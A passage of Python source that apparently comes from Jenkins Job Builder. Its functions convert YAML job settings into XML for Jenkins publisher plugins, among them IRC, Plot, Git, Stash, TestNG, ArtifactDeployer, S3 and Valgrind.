disallow bot commands (default false)
:arg string matrix-notifier: notify for matrix projects
instant-messaging-plugin injects an additional
field in the configuration form whenever the
project is a multi-configuration project
:matrix-notifier values:
* **all**
* **only-configurations** (default)
* **only-parent**
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ircbot001.yaml
:language: yaml
"""
top = XML.SubElement(xml_parent, 'hudson.plugins.ircbot.IrcPublisher')
message_dict = {'summary-scm': 'DefaultBuildToChatNotifier',
'summary': 'SummaryOnlyBuildToChatNotifier',
'summary-params': 'BuildParametersBuildToChatNotifier',
'summary-scm-fail': 'PrintFailingTestsBuildToChatNotifier'}
message = data.get('message-type', 'summary-scm')
if message not in message_dict:
raise JenkinsJobsException("message-type entered is not valid, must "
"be one of: %s" %
", ".join(message_dict.keys()))
message = "hudson.plugins.im.build_notify." + message_dict.get(message)
XML.SubElement(top, 'buildToChatNotifier', attrib={'class': message})
strategy_dict = {'all': 'ALL',
'any-failure': 'ANY_FAILURE',
'failure-and-fixed': 'FAILURE_AND_FIXED',
'new-failure-and-fixed': 'NEW_FAILURE_AND_FIXED',
'statechange-only': 'STATECHANGE_ONLY'}
strategy = data.get('strategy', 'all')
if strategy not in strategy_dict:
raise JenkinsJobsException("strategy entered is not valid, must be "
"one of: %s" %
", ".join(strategy_dict.keys()))
XML.SubElement(top, 'strategy').text = strategy_dict.get(strategy)
targets = XML.SubElement(top, 'targets')
channels = data.get('channels', [])
for channel in channels:
sub = XML.SubElement(targets,
'hudson.plugins.im.GroupChatIMMessageTarget')
XML.SubElement(sub, 'name').text = channel.get('name')
XML.SubElement(sub, 'password').text = channel.get('password')
XML.SubElement(sub, 'notificationOnly').text = str(
channel.get('notify-only', False)).lower()
XML.SubElement(top, 'notifyOnBuildStart').text = str(
data.get('notify-start', False)).lower()
XML.SubElement(top, 'notifySuspects').text = str(
data.get('notify-committers', False)).lower()
XML.SubElement(top, 'notifyCulprits').text = str(
data.get('notify-culprits', False)).lower()
XML.SubElement(top, 'notifyFixers').text = str(
data.get('notify-fixers', False)).lower()
XML.SubElement(top, 'notifyUpstreamCommitters').text = str(
data.get('notify-upstream', False)).lower()
matrix_dict = {'all': 'ALL',
'only-configurations': 'ONLY_CONFIGURATIONS',
'only-parent': 'ONLY_PARENT'}
matrix = data.get('matrix-notifier', 'only-configurations')
if matrix not in matrix_dict:
raise JenkinsJobsException("matrix-notifier entered is not valid, "
"must be one of: %s" %
", ".join(matrix_dict.keys()))
XML.SubElement(top, 'matrixMultiplier').text = matrix_dict.get(matrix)
def plot(parser, xml_parent, data):
"""yaml: plot
Plot provides generic plotting (or graphing).
Requires the Jenkins :jenkins-wiki:`Plot Plugin <Plot+Plugin>`.
:arg str title: title for the graph (default '')
:arg str yaxis: title of Y axis (default '')
:arg str group: name of the group to which the plot belongs (required)
:arg int num-builds: number of builds to plot across
(default plot all builds)
:arg str style: Specifies the graph style of the plot
Can be: area, bar, bar3d, line, line3d, stackedArea, stackedbar,
stackedbar3d, waterfall (default 'line')
:arg bool use-description: When false, the X-axis labels are formed using
build numbers and dates, and the corresponding tooltips contain the
build descriptions. When enabled, the contents of the labels and
tooltips are swapped, with the descriptions used as X-axis labels and
the build number and date used for tooltips. (default false)
:arg bool exclude-zero-yaxis: When false, Y-axis contains the value zero
even if it is not included in the data series. When true, the value
zero is not automatically included. (default false)
:arg bool logarithmic-yaxis: When true, the Y-axis will use a logarithmic
scale. By default, the Y-axis uses a linear scale. (default false)
:arg bool keep-records: When true, show all builds up to 'Number of
builds to include'. (default false)
:arg str csv-file-name: Use for choosing the file name in which the data
will be persisted. If none specified and random name is generated as
done in the Jenkins Plot plugin. (default random generated .csv
filename, same behaviour as the Jenkins Plot plugin)
:arg list series: list data series definitions
:Serie: * **file** (`str`) : files to include
* **inclusion-flag** filtering mode for CSV files. Possible
values are:
* **off** (default)
* **include-by-string**
* **exclude-by-string**
* **include-by-column**
* **exclude-by-column**
* **exclude** (`str`) : exclude pattern for CSV file.
* **url** (`str`) : for 'csv' and 'xml' file types
used when you click on a point (default empty)
* **display-table** (`bool`) : for 'csv' file type
if true, original CSV will be shown above plot (default false)
* **label** (`str`) : used by 'properties' file type
Specifies the legend label for this data series.
(default empty)
* **format** (`str`) : Type of file where we get datas.
Can be: properties, csv, xml
* **xpath-type** (`str`) : The result type of the expression must
be supplied due to limitations in the java.xml.xpath parsing.
The result can be: node, nodeset, boolean, string, or number.
Strings and numbers will be converted to double. Boolean will
be converted to 1 for true, and 0 for false. (default 'node')
* **xpath** (`str`) : used by 'xml' file type
Xpath which selects the values that should be plotted.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/plot004.yaml
:language: yaml
.. literalinclude:: /../../tests/publishers/fixtures/plot005.yaml
:language: yaml
"""
top = XML.SubElement(xml_parent, 'hudson.plugins.plot.PlotPublisher')
plots = XML.SubElement(top, 'plots')
format_dict = {'properties': 'hudson.plugins.plot.PropertiesSeries',
'csv': 'hudson.plugins.plot.CSVSeries',
'xml': 'hudson.plugins.plot.XMLSeries'}
xpath_dict = {'nodeset': 'NODESET', 'node': 'NODE', 'string': 'STRING',
'boolean': 'BOOLEAN', 'number': 'NUMBER'}
inclusion_dict = {'off': 'OFF',
'include-by-string': 'INCLUDE_BY_STRING',
'exclude-by-string': 'EXCLUDE_BY_STRING',
'include-by-column': 'INCLUDE_BY_COLUMN',
'exclude-by-column': 'EXCLUDE_BY_COLUMN'}
for plot in data:
plugin = XML.SubElement(plots, 'hudson.plugins.plot.Plot')
XML.SubElement(plugin, 'title').text = plot.get('title', '')
XML.SubElement(plugin, 'yaxis').text = plot['yaxis']
XML.SubElement(plugin, 'csvFileName').text = \
plot.get('csv-file-name', '%s.csv' % random.randrange(2 << 32))
topseries = XML.SubElement(plugin, 'series')
series = plot['series']
for serie in series:
format_data = serie.get('format')
if format_data not in format_dict:
raise JenkinsJobsException("format entered is not valid, must "
"be one of: %s" %
" , ".join(format_dict.keys()))
subserie = XML.SubElement(topseries, format_dict.get(format_data))
XML.SubElement(subserie, 'file').text = serie.get('file')
if format_data == 'properties':
XML.SubElement(subserie, 'label').text = serie.get('label', '')
if format_data == 'csv':
inclusion_flag = serie.get('inclusion-flag', 'off')
if inclusion_flag not in inclusion_dict:
raise JenkinsJobsException("Inclusion flag result entered "
"is not valid, must be one of: "
"%s"
% ", ".join(inclusion_dict))
XML.SubElement(subserie, 'inclusionFlag').text = \
inclusion_dict.get(inclusion_flag)
XML.SubElement(subserie, 'exclusionValues').text = \
serie.get('exclude', '')
if serie.get('exclude', ''):
exclude_strings = serie.get('exclude', '').split(',')
exclusionset = XML.SubElement(subserie, 'strExclusionSet')
for exclude_string in exclude_strings:
XML.SubElement(exclusionset, 'string').text = \
exclude_string
XML.SubElement(subserie, 'url').text = serie.get('url', '')
XML.SubElement(subserie, 'displayTableFlag').text = \
str(plot.get('display-table', False)).lower()
if format_data == 'xml':
XML.SubElement(subserie, 'url').text = serie.get('url', '')
XML.SubElement(subserie, 'xpathString').text = \
serie.get('xpath')
xpathtype = serie.get('xpath-type', 'node')
if xpathtype not in xpath_dict:
raise JenkinsJobsException("XPath result entered is not "
"valid, must be one of: %s" %
", ".join(xpath_dict))
XML.SubElement(subserie, 'nodeTypeString').text = \
xpath_dict.get(xpathtype)
XML.SubElement(subserie, 'fileType').text = serie.get('format')
mappings = [
('group', 'group', None),
('use-description', 'useDescr', False),
('exclude-zero-yaxis', 'exclZero', False),
('logarithmic-yaxis', 'logarithmic', False),
('keep-records', 'keepRecords', False),
('num-builds', 'numBuilds', '')]
helpers.convert_mapping_to_xml(
plugin, plot, mappings, fail_required=True)
style_list = ['area', 'bar', 'bar3d', 'line', 'line3d', 'stackedArea',
'stackedbar', 'stackedbar3d', 'waterfall']
style = plot.get('style', 'line')
if style not in style_list:
raise JenkinsJobsException("style entered is not valid, must be "
"one of: %s" % ", ".join(style_list))
XML.SubElement(plugin, 'style').text = style
def git(parser, xml_parent, data):
"""yaml: git
This plugin will configure the Jenkins Git plugin to
push merge results, tags, and/or branches to
remote repositories after the job completes.
Requires the Jenkins :jenkins-wiki:`Git Plugin <Git+Plugin>`.
:arg bool push-merge: push merges back to the origin specified in the
pre-build merge options (default false)
:arg bool push-only-if-success: Only push to remotes if the build succeeds
- otherwise, nothing will be pushed.
(default true)
:arg bool force-push: Add force option to git push (default false)
:arg list tags: tags to push at the completion of the build
:tag: * **remote** (`str`) remote repo name to push to
(default 'origin')
* **name** (`str`) name of tag to push
* **message** (`str`) message content of the tag
* **create-tag** (`bool`) whether or not to create the tag
after the build, if this is False then the tag needs to
exist locally (default false)
* **update-tag** (`bool`) whether to overwrite a remote tag
or not (default false)
:arg list branches: branches to push at the completion of the build
:branch: * **remote** (`str`) remote repo name to push to
(default 'origin')
* **name** (`str`) name of remote branch to push to
:arg list notes: notes to push at the completion of the build
:note: * **remote** (`str`) remote repo name to push to
(default 'origin')
* **message** (`str`) content of the note
* **namespace** (`str`) namespace of the note
(default master)
* **replace-note** (`bool`) whether to overwrite a note or not
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/git001.yaml
:language: yaml
"""
mappings = [('push-merge', 'pushMerge', False),
('push-only-if-success', 'pushOnlyIfSuccess', True),
('force-push', 'forcePush', False)]
tag_mappings = [('remote', 'targetRepoName', 'origin'),
('name', 'tagName', None),
('message', 'tagMessage', ''),
('create-tag', 'createTag', False),
('update-tag', 'updateTag', False)]
branch_mappings = [('remote', 'targetRepoName', 'origin'),
('name', 'branchName', None)]
note_mappings = [('remote', 'targetRepoName', 'origin'),
('message', 'noteMsg', None),
('namespace', 'noteNamespace', 'master'),
('replace-note', 'noteReplace', False)]
def handle_entity_children(entity, entity_xml, child_mapping):
for prop in child_mapping:
opt, xmlopt, default_val = prop[:3]
val = entity.get(opt, default_val)
if val is None:
raise JenkinsJobsException('Required option missing: %s' % opt)
if type(val) == bool:
val = str(val).lower()
XML.SubElement(entity_xml, xmlopt).text = val
top = XML.SubElement(xml_parent, 'hudson.plugins.git.GitPublisher')
XML.SubElement(top, 'configVersion').text = '2'
handle_entity_children(data, top, mappings)
tags = data.get('tags', [])
if tags:
xml_tags = XML.SubElement(top, 'tagsToPush')
for tag in tags:
xml_tag = XML.SubElement(
xml_tags,
'hudson.plugins.git.GitPublisher_-TagToPush')
handle_entity_children(tag['tag'], xml_tag, tag_mappings)
branches = data.get('branches', [])
if branches:
xml_branches = XML.SubElement(top, 'branchesToPush')
for branch in branches:
xml_branch = XML.SubElement(
xml_branches,
'hudson.plugins.git.GitPublisher_-BranchToPush')
handle_entity_children(branch['branch'], xml_branch,
branch_mappings)
notes = data.get('notes', [])
if notes:
xml_notes = XML.SubElement(top, 'notesToPush')
for note in notes:
xml_note = XML.SubElement(
xml_notes,
'hudson.plugins.git.GitPublisher_-NoteToPush')
handle_entity_children(note['note'], xml_note, note_mappings)
def github_notifier(parser, xml_parent, data):
"""yaml: github-notifier
Set build status on Github commit.
Requires the Jenkins :jenkins-wiki:`Github Plugin <GitHub+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/github-notifier.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'com.cloudbees.jenkins.GitHubCommitNotifier')
def gitlab_notifier(parser, xml_parent, data):
"""yaml: gitlab-notifier
Set build status on GitLab commit.
Requires the Jenkins :jenkins-wiki:`GitLab Plugin <GitLab+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/gitlab-notifier.yaml
:language: yaml
"""
XML.SubElement(
xml_parent,
'com.dabsquared.gitlabjenkins.publisher.GitLabCommitStatusPublisher')
def zulip(parser, xml_parent, data):
"""yaml: zulip
Set build status on zulip.
Requires the Jenkins :jenkins-wiki:`Humbug Plugin <Humbug+Plugin>`.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/zulip.yaml
:language: yaml
"""
XML.SubElement(xml_parent,
'hudson.plugins.humbug.HumbugNotifier')
def build_publisher(parser, xml_parent, data):
"""yaml: build-publisher
This plugin allows records from one Jenkins to be published
on another Jenkins.
Requires the Jenkins :jenkins-wiki:`Build Publisher Plugin
<Build+Publisher+Plugin>`.
:arg bool publish-unstable-builds: publish unstable builds (default true)
:arg bool publish-failed-builds: publish failed builds (default true)
:arg int days-to-keep: days to keep when publishing results (optional)
:arg int num-to-keep: number of jobs to keep in the published results
(optional)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/build-publisher002.yaml
:language: yaml
"""
reporter = XML.SubElement(
xml_parent,
'hudson.plugins.build__publisher.BuildPublisher')
XML.SubElement(reporter, 'publishUnstableBuilds').text = \
str(data.get('publish-unstable-builds', True)).lower()
XML.SubElement(reporter, 'publishFailedBuilds').text = \
str(data.get('publish-failed-builds', True)).lower()
if 'days-to-keep' in data or 'num-to-keep' in data:
logrotator = XML.SubElement(reporter, 'logRotator')
XML.SubElement(logrotator, 'daysToKeep').text = \
str(data.get('days-to-keep', -1))
XML.SubElement(logrotator, 'numToKeep').text = \
str(data.get('num-to-keep', -1))
# hardcoded to -1 to emulate what the build publisher
# plugin seem to do.
XML.SubElement(logrotator, 'artifactDaysToKeep').text = "-1"
XML.SubElement(logrotator, 'artifactNumToKeep').text = "-1"
def stash(parser, xml_parent, data):
"""yaml: stash
This plugin will configure the Jenkins Stash Notifier plugin to
notify Atlassian Stash after job completes.
Requires the Jenkins :jenkins-wiki:`StashNotifier Plugin
<StashNotifier+Plugin>`.
:arg string url: Base url of Stash Server (default "")
:arg string username: Username of Stash Server (default "")
:arg string password: Password of Stash Server (default "")
:arg string credentials-id: Credentials of Stash Server (optional)
:arg bool ignore-ssl: Ignore unverified SSL certificate (default false)
:arg string commit-sha1: Commit SHA1 to notify (default "")
:arg bool include-build-number: Include build number in key
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/stash001.yaml
:language: yaml
"""
top = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.stashNotifier.StashNotifier')
XML.SubElement(top, 'stashServerBaseUrl').text = data.get('url', '')
if data.get('credentials-id') is not None:
XML.SubElement(top, 'credentialsId').text = str(
data.get('credentials-id'))
else:
XML.SubElement(top, 'stashUserName'
).text = helpers.get_value_from_yaml_or_config_file(
'username', 'stash', data, parser)
XML.SubElement(top, 'stashUserPassword'
).text = helpers.get_value_from_yaml_or_config_file(
'password', 'stash', data, parser)
XML.SubElement(top, 'ignoreUnverifiedSSLPeer').text = str(
data.get('ignore-ssl', False)).lower()
XML.SubElement(top, 'commitSha1').text = data.get('commit-sha1', '')
XML.SubElement(top, 'includeBuildNumberInKey').text = str(
data.get('include-build-number', False)).lower()
def dependency_check(parser, xml_parent, data):
"""yaml: dependency-check
Dependency-Check is an open source utility that identifies project
dependencies and checks if there are any known, publicly disclosed,
vulnerabilities.
Requires the Jenkins :jenkins-wiki:`OWASP Dependency-Check Plugin
<OWASP+Dependency-Check+Plugin>`.
:arg str pattern: Report filename pattern (optional)
:arg bool can-run-on-failed: Also runs for failed builds, instead of just
stable or unstable builds (default false)
:arg bool should-detect-modules: Determines if Ant or Maven modules should
be detected for all files that contain warnings (default false)
:arg int healthy: Sunny threshold (optional)
:arg int unhealthy: Stormy threshold (optional)
:arg str health-threshold: Threshold priority for health status
('low', 'normal' or 'high', defaulted to 'low')
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. (optional)
:thresholds:
* **unstable** (`dict`)
:unstable: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
* **failed** (`dict`)
:failed: * **total-all** (`int`)
* **total-high** (`int`)
* **total-normal** (`int`)
* **total-low** (`int`)
* **new-all** (`int`)
* **new-high** (`int`)
* **new-normal** (`int`)
* **new-low** (`int`)
:arg str default-encoding: Encoding for parsing or showing files (optional)
:arg bool do-not-resolve-relative-paths: (default false)
:arg bool dont-compute-new: If set to false, computes new warnings based on
the reference build (default true)
:arg bool use-previous-build-as-reference: determines whether to always
use the previous build as the reference build (default false)
:arg bool use-stable-build-as-reference: The number of new warnings will be
calculated based on the last stable build, allowing reverts of unstable
builds where the number of warnings was decreased. (default false)
:arg bool use-delta-values: If set then the number of new warnings is
calculated by subtracting the total number of warnings of the current
build from the reference build.
(default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/dependency-check001.yaml
:language: yaml
"""
dependency_check = XML.SubElement(
xml_parent,
'org.jenkinsci.plugins.DependencyCheck.DependencyCheckPublisher')
# trends
helpers.build_trends_publisher(
'[DEPENDENCYCHECK] ', dependency_check, data)
def description_setter(parser, xml_parent, data):
"""yaml: description-setter
This plugin sets the description for each build,
based upon a RegEx test of the build log file.
Requires the Jenkins :jenkins-wiki:`Description Setter Plugin
<Description+Setter+Plugin>`.
:arg str regexp: A RegEx which is used to scan the build log file
:arg str regexp-for-failed: A RegEx which is used for failed builds
(optional)
:arg str description: The description to set on the build (optional)
:arg str description-for-failed: The description to set on
the failed builds (optional)
:arg bool set-for-matrix: Also set the description on
a multi-configuration build (default false)
Example:
.. literalinclude::
/../../tests/publishers/fixtures/description-setter001.yaml
:language: yaml
"""
descriptionsetter = XML.SubElement(
xml_parent,
'hudson.plugins.descriptionsetter.DescriptionSetterPublisher')
XML.SubElement(descriptionsetter, 'regexp').text = data.get('regexp', '')
XML.SubElement(descriptionsetter, 'regexpForFailed').text = \
data.get('regexp-for-failed', '')
if 'description' in data:
XML.SubElement(descriptionsetter, 'description').text = \
data['description']
if 'description-for-failed' in data:
XML.SubElement(descriptionsetter, 'descriptionForFailed').text = \
data['description-for-failed']
for_matrix = str(data.get('set-for-matrix', False)).lower()
XML.SubElement(descriptionsetter, 'setForMatrix').text = for_matrix
def doxygen(parser, xml_parent, data):
"""yaml: doxygen
This plugin parses the Doxygen descriptor (Doxyfile) and provides a link to
the generated Doxygen documentation.
Requires the Jenkins :jenkins-wiki:`Doxygen Plugin <Doxygen+Plugin>`.
:arg str doxyfile: The doxyfile path
:arg str slave: The node or label to pull the doxygen HTML files from
:arg bool keep-all: Retain doxygen generation for each successful build
(default false)
:arg str folder: Folder where you run doxygen (default '')
Example:
.. literalinclude:: /../../tests/publishers/fixtures/doxygen001.yaml
:language: yaml
"""
logger = logging.getLogger(__name__)
p = XML.SubElement(xml_parent, 'hudson.plugins.doxygen.DoxygenArchiver')
if not data.get('doxyfile'):
raise JenkinsJobsException('The path to a doxyfile must be specified.')
XML.SubElement(p, 'doxyfilePath').text = str(data.get('doxyfile'))
XML.SubElement(p, 'runOnChild').text = str(data.get('slave', ''))
# backward compatibility
if 'keepall' in data:
if 'keep-all' in data:
XML.SubElement(p, 'keepAll').text = str(
data.get('keep-all', False)).lower()
logger.warn("The value of 'keepall' will be ignored "
"in preference to 'keep-all'.")
else:
XML.SubElement(p, 'keepAll').text = str(
data.get('keepall', False)).lower()
logger.warn("'keepall' is deprecated please use 'keep-all'")
else:
XML.SubElement(p, 'keepAll').text = str(
data.get('keep-all', False)).lower()
XML.SubElement(p, 'folderWhereYouRunDoxygen').text = str(
data.get('folder', ''))
def sitemonitor(parser, xml_parent, data):
"""yaml: sitemonitor
This plugin checks the availability of an url.
It requires the :jenkins-wiki:`sitemonitor plugin <SiteMonitor+Plugin>`.
:arg list sites: List of URLs to check
Example:
.. literalinclude:: /../../tests/publishers/fixtures/sitemonitor001.yaml
:language: yaml
"""
mon = XML.SubElement(xml_parent,
'hudson.plugins.sitemonitor.SiteMonitorRecorder')
if data.get('sites'):
sites = XML.SubElement(mon, 'mSites')
for siteurl in data.get('sites'):
site = XML.SubElement(sites,
'hudson.plugins.sitemonitor.model.Site')
XML.SubElement(site, 'mUrl').text = siteurl['url']
def testng(parser, xml_parent, data):
"""yaml: testng
This plugin publishes TestNG test reports.
Requires the Jenkins :jenkins-wiki:`TestNG Results Plugin <testng-plugin>`.
:arg str pattern: filename pattern to locate the TestNG XML report files
(required)
:arg bool escape-test-description: escapes the description string
associated with the test method while displaying test method details
(default true)
:arg bool escape-exception-msg: escapes the test method's exception
messages. (default true)
:arg bool fail-on-failed-test-config: Allows for a distinction between
failing tests and failing configuration methods (>=1.10) (default
false)
:arg bool show-failed-builds: include results from failed builds in the
trend graph (>=1.6) (default false)
:arg int unstable-skips: Build is marked UNSTABLE if the number/percentage
of skipped tests exceeds the specified threshold (>=1.11) (default 100)
:arg int unstable-fails: Build is marked UNSTABLE if the number/percentage
of failed tests exceeds the specified threshold (>=1.11) (default 0)
:arg int failed-skips: Build is marked FAILURE if the number/percentage of
skipped tests exceeds the specified threshold (>=1.11) (default 100)
:arg int failed-fails: Build is marked FAILURE if the number/percentage of
failed tests exceeds the specified threshold (>=1.11) (default 100)
:arg str threshold-mode: Interpret threshold as number of tests or
percentage of tests (>=1.11) (default percentage)
Full Example:
.. literalinclude:: /../../tests/publishers/fixtures/testng-full.yaml
:language: yaml
Minimal Example:
.. literalinclude:: /../../tests/publishers/fixtures/testng-minimal.yaml
:language: yaml
"""
reporter = XML.SubElement(xml_parent, 'hudson.plugins.testng.Publisher')
reporter.set('plugin', 'testng-plugin')
valid_threshold_modes = ['number', 'percentage']
threshold_mode = data.get('threshold-mode', 'percentage')
mappings = [
('pattern', 'reportFilenamePattern', None),
('escape-test-description', 'escapeTestDescp', True),
('escape-exception-msg', 'escapeExceptionMsg', True),
('fail-on-failed-test-config', 'failureOnFailedTestConfig', False),
('show-failed-builds', 'showFailedBuilds', False),
('unstable-skips', 'unstableSkips', 100),
('unstable-fails', 'unstableFails', 0),
('failed-skips', 'failedSkips', 100),
('failed-fails', 'failedFails', 100),
]
helpers.convert_mapping_to_xml(
reporter, data, mappings, fail_required=True)
if threshold_mode == 'number':
XML.SubElement(reporter, 'thresholdMode').text = str(1)
elif threshold_mode == 'percentage':
XML.SubElement(reporter, 'thresholdMode').text = str(2)
else:
raise InvalidAttributeError(
'threshold-mode', threshold_mode, valid_threshold_modes)
def artifact_deployer(parser, xml_parent, data):
"""yaml: artifact-deployer
This plugin makes it possible to copy artifacts to remote locations.
Requires the Jenkins :jenkins-wiki:`ArtifactDeployer Plugin
<ArtifactDeployer+Plugin>`.
:arg list entries:
:entries:
* **files** (`str`) - files to deploy
* **basedir** (`str`) - the dir from files are deployed
* **excludes** (`str`) - the mask to exclude files
* **remote** (`str`) - a remote output directory
* **flatten** (`bool`) - ignore the source directory structure
(default false)
* **delete-remote** (`bool`) - clean-up remote directory
before deployment (default false)
* **delete-remote-artifacts** (`bool`) - delete remote artifacts
when the build is deleted (default false)
* **fail-no-files** (`bool`) - fail build if there are no files
(default false)
* **groovy-script** (`str`) - execute a Groovy script
before a build is deleted
:arg bool deploy-if-fail: Deploy if the build is failed (default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/artifact-dep.yaml
:language: yaml
"""
deployer = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.artifactdeployer.'
'ArtifactDeployerPublisher')
if data is None or 'entries' not in data:
raise Exception('entries field is missing')
elif data.get('entries', None) is None:
entries = XML.SubElement(deployer, 'entries', {'class': 'empty-list'})
else:
entries = XML.SubElement(deployer, 'entries')
for entry in data.get('entries'):
deployer_entry = XML.SubElement(
entries,
'org.jenkinsci.plugins.artifactdeployer.ArtifactDeployerEntry')
XML.SubElement(deployer_entry, 'includes').text = \
entry.get('files')
XML.SubElement(deployer_entry, 'basedir').text = \
entry.get('basedir')
XML.SubElement(deployer_entry, 'excludes').text = \
entry.get('excludes')
XML.SubElement(deployer_entry, 'remote').text = entry.get('remote')
XML.SubElement(deployer_entry, 'flatten').text = \
str(entry.get('flatten', False)).lower()
XML.SubElement(deployer_entry, 'deleteRemote').text = \
str(entry.get('delete-remote', False)).lower()
XML.SubElement(deployer_entry, 'deleteRemoteArtifacts').text = \
str(entry.get('delete-remote-artifacts', False)).lower()
XML.SubElement(deployer_entry, 'failNoFilesDeploy').text = \
str(entry.get('fail-no-files', False)).lower()
XML.SubElement(deployer_entry, 'groovyExpression').text = \
entry.get('groovy-script')
deploy_if_fail = str(data.get('deploy-if-fail', False)).lower()
XML.SubElement(deployer, 'deployEvenBuildFail').text = deploy_if_fail
def s3(parser, xml_parent, data):
"""yaml: s3
Upload build artifacts to Amazon S3.
Requires the Jenkins :jenkins-wiki:`S3 plugin <S3+Plugin>`.
:arg str s3-profile: Globally-defined S3 profile to use
:arg list entries:
:entries:
* **destination-bucket** (`str`) - Destination S3 bucket
* **source-files** (`str`) - Source files (Ant glob syntax)
* **storage-class** (`str`) - S3 storage class; one of "STANDARD"
or "REDUCED_REDUNDANCY"
* **bucket-region** (`str`) - S3 bucket region (capitalized with
underscores)
* **upload-on-failure** (`bool`) - Upload files even if the build
failed (default false)
* **upload-from-slave** (`bool`) - Perform the upload directly from
the Jenkins slave rather than the master node. (default false)
* **managed-artifacts** (`bool`) - Let Jenkins fully manage the
published artifacts, similar to when artifacts are published to
the Jenkins master. (default false)
* **s3-encryption** (`bool`) - Use S3 AES-256 server side encryption
support. (default false)
* **flatten** (`bool`) - Ignore the directory structure of the
artifacts in the source project and copy all matching artifacts
directly into the specified bucket. (default false)
:arg list metadata-tags:
:metadata-tags:
* **key** Metadata key for files from this build. It will be
prefixed by "x-amz-meta-" when uploaded to S3. Can contain macros
(e.g. environment variables).
* **value** Metadata value associated with the key. Can contain macros.
Example:
.. literalinclude:: /../../tests/publishers/fixtures/s3001.yaml
:language: yaml
"""
deployer = XML.SubElement(xml_parent,
'hudson.plugins.s3.S3BucketPublisher')
if data is None or not data.get('entries'):
raise JenkinsJobsException('No filesets defined.')
XML.SubElement(deployer, 'profileName').text = data.get('s3-profile')
entries = XML.SubElement(deployer, 'entries')
for entry in data.get('entries'):
fileset = XML.SubElement(entries, 'hudson.plugins.s3.Entry')
# xml keys -> yaml keys
settings = [('bucket', 'destination-bucket', ''),
('sourceFile', 'source-files', ''),
('storageClass', 'storage-class', ''),
('selectedRegion', 'bucket-region', ''),
('noUploadOnFailure', 'upload-on-failure', False),
('uploadFromSlave', 'upload-from-slave', False),
('managedArtifacts', 'managed-artifacts', False),
('useServerSideEncryption', 's3-encryption', False),
('flatten', 'flatten', False)]
for xml_key, yaml_key, default in settings:
xml_config = XML.SubElement(fileset, xml_key)
config_value = entry.get(yaml_key, default)
if xml_key == 'noUploadOnFailure':
xml_config.text = str(not config_value).lower()
elif isinstance(default, bool):
xml_config.text = str(config_value).lower()
else:
xml_config.text = str(config_value)
metadata = XML.SubElement(deployer, 'userMetadata')
for tag in data.get('metadata-tags', []):
pair = XML.SubElement(metadata, 'hudson.plugins.s3.MetadataPair')
XML.SubElement(pair, 'key').text = tag.get('key')
XML.SubElement(pair, 'value').text = tag.get('value')
def ruby_metrics(parser, xml_parent, data):
"""yaml: ruby-metrics
Rcov plugin parses rcov html report files and
shows it in Jenkins with a trend graph.
Requires the Jenkins :jenkins-wiki:`Ruby metrics plugin
<RubyMetrics+plugin>`.
:arg str report-dir: Relative path to the coverage report directory
:arg dict targets:
:targets: (total-coverage, code-coverage)
* **healthy** (`int`): Healthy threshold
* **unhealthy** (`int`): Unhealthy threshold
* **unstable** (`int`): Unstable threshold
Example:
.. literalinclude:: /../../tests/publishers/fixtures/ruby-metrics.yaml
:language: yaml
"""
metrics = XML.SubElement(
xml_parent,
'hudson.plugins.rubyMetrics.rcov.RcovPublisher')
report_dir = data.get('report-dir', '')
XML.SubElement(metrics, 'reportDir').text = report_dir
targets = XML.SubElement(metrics, 'targets')
if 'target' in data:
for t in data['target']:
if not ('code-coverage' in t or 'total-coverage' in t):
raise JenkinsJobsException('Unrecognized target name')
el = XML.SubElement(
targets,
'hudson.plugins.rubyMetrics.rcov.model.MetricTarget')
if 'total-coverage' in t:
XML.SubElement(el, 'metric').text = 'TOTAL_COVERAGE'
else:
XML.SubElement(el, 'metric').text = 'CODE_COVERAGE'
for threshold_name, threshold_value in \
next(iter(t.values())).items():
elname = threshold_name.lower()
XML.SubElement(el, elname).text = str(threshold_value)
else:
raise JenkinsJobsException('Coverage metric targets must be set')
def fitnesse(parser, xml_parent, data):
"""yaml: fitnesse
Publish Fitnesse test results
Requires the Jenkins :jenkins-wiki:`Fitnesse plugin <Fitnesse+Plugin>`.
:arg str results: path specifier for results files
Example:
.. literalinclude:: /../../tests/publishers/fixtures/fitnesse001.yaml
:language: yaml
"""
fitnesse = XML.SubElement(
xml_parent,
'hudson.plugins.fitnesse.FitnesseResultsRecorder')
results = data.get('results', '')
XML.SubElement(fitnesse, 'fitnessePathToXmlResultsIn').text = results
def valgrind(parser, xml_parent, data):
"""yaml: valgrind
This plugin publishes Valgrind Memcheck XML results.
Requires the Jenkins :jenkins-wiki:`Valgrind Plugin <Valgrind+Plugin>`.
:arg str pattern: Filename pattern to locate the Valgrind XML report files
(required)
:arg dict thresholds: Mark build as failed or unstable if the number of
errors exceeds a threshold. All threshold values are optional.
:thresholds:
* **unstable** (`dict`)
:unstable: * **invalid-read-write** (`int`)
* **definitely-lost** (`int`)
* **total** (`int`)
* **failed** (`dict`)
:failed: * **invalid-read-write** (`int`)
* **definitely-lost** (`int`)
* **total** (`int`)
:arg bool fail-no-reports: Fail build if no reports are found
(default false)
:arg bool fail-invalid-reports: Fail build if reports are malformed
(default false)
:arg bool publish-if-aborted: Publish results for aborted builds
(default false)
:arg bool publish-if-failed: Publish results for failed builds
(default false)
Example:
.. literalinclude:: /../../tests/publishers/fixtures/valgrind001.yaml
:language: yaml
"""
p = XML.SubElement(xml_parent,
'org.jenkinsci.plugins.valgrind.ValgrindPublisher')
p = XML.SubElement(p, 'valgrindPublisherConfig')
if 'pattern' not in data:
raise JenkinsJobsException("A filename pattern must be specified.")
XML.SubElement(p, 'pattern').text = data['pattern']
dthresholds = data.get('thresholds', {})
